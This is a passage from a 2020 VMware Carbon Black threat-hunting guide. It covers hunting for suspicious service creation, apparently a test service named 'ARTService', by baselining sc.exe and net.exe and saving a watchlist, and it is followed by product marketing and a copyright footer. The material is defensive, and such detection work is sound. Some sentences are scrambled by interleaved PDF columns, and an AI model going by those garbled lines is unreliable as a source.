Can you block it? No, the creation of services will happen frequently with in most organizations. To reduce your attack surface, in your endpoint security solution baseline the usage of sc.exe and net.exe;
• Does this ‘ARTService’ exist elsewhere in your organization? • Has this ‘ARTService’ run in the last 30 days? • Who should be creating services in your environment?
Review facets on the left-hand side to start refining the query further (i.e., is there a common parent process or user group we can remove from monitoring to create a higher fidelity query?). Save Query as a Watchlist – DO NOT alert.
32 33 One Platform for Your Endpoint Security
VMware Carbon Black Cloud consolidates multiple endpoint security capabilities using one Endpoint standard – next-generation antivirus and behavioral EDR agent and console, helping you operate faster and more effectively. As part of VMware’s Analyze attacker behavior patterns over time to detect and stop never-seen-before attacks, intrinsic security approach, VMware Carbon Black Cloud spans the system hardening and whether they are malware, fileless or living-off-the-land attacks. threat prevention workflow to accelerate responses and defend against a variety of threats. Managed detection – managed alert monitoring and triage Gain 24-hour visibility from our security operations center of expert analysts, who provide validation, context into root cause and automated monthly executive reporting. Cloud- Native Endpoint Protection Platform Cloud-Native Endpoint Protection Program Audit and remediation – real-time device assessment and remediation Easily audit the current system state to track and harden the security posture of all your protected devices.
Enterprise EDR – threat hunting and containment Proactively hunt for abnormal activity using threat intelligence and customizable detections.
One Lightweight Agent
Next Gen Endpoint Detection Managed Audit & Antivirus & Response (EDR) Detection Remediation
34 35 VMware, Inc. 3401 Hillview Avenue Palo Alto CA 94304 USA Tel 877-486-9273 Fax 650-427-5001 vmware.com Copyright © 2020 VMware, Inc. All rights reserved. This product is protected by U.S. and international copyright and intellectual property laws. VMware products are covered by one or more patents listed at vmware.com/go/patents. VMware and Carbon Black are registered trademarks or trademarks of VMware, Inc. and its subsidiaries in the United States and other jurisdictions. All other marks and names mentioned herein may be trademarks of their respective companies.